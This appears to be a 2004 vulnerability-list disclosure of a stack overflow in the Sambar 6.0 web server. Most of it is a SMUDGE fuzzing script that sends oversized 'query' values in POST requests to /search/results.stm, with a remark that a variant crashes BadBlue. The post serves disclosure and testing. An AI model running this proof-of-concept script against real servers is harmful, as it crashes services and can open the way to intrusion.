Sambar 6.0 stack overflow
ned <[email protected]> Fri, 6 Feb 2004 17:35:30 -0800 (PST)
| Newsgroups | gmane.comp.security.vulnerabilities,gmane.comp.security.vulnerabilities.watch.general |
|---|---|
| Message-ID | <[email protected]> |
Hi lists, The following SMUDGE (http://felinemenace.org/~nd/SMUDGE) script will cause a (difficult to exploit) stack overflow in a default set up of the Sambar web server. --- start script # http://felinemenace.org/~nd/SMUDGE # Sambar script (c) [email protected] from SMUDGE import * import sys sm = SMUDGE(1) sm.setname("SambarOverflow") sm.plain("POST /search/results.stm HTTP/1.1") sm.addcrlf() sm.plain("Host: MSUDGEDPU") sm.addcrlf() sm.plain("Content-Length: ") sm.blocksize("postdata") sm.addcrlf() sm.addcrlf() sm.putblock("postdata") sm.addcrlf() sm.addcrlf() sm.newblock("postdata") sm.updateblock("postdata","spage=0&indexname=docs&query=") sm.blockvariable("postdata","MEEP") sm.updateblock("postdata","&style=page") sm.run("127.0.0.1",80,"topdown","single") -- end script A modification of this script will also cause misc expections in the BadBlue webserver ;) - endee -- http://felinemenace.org/~nd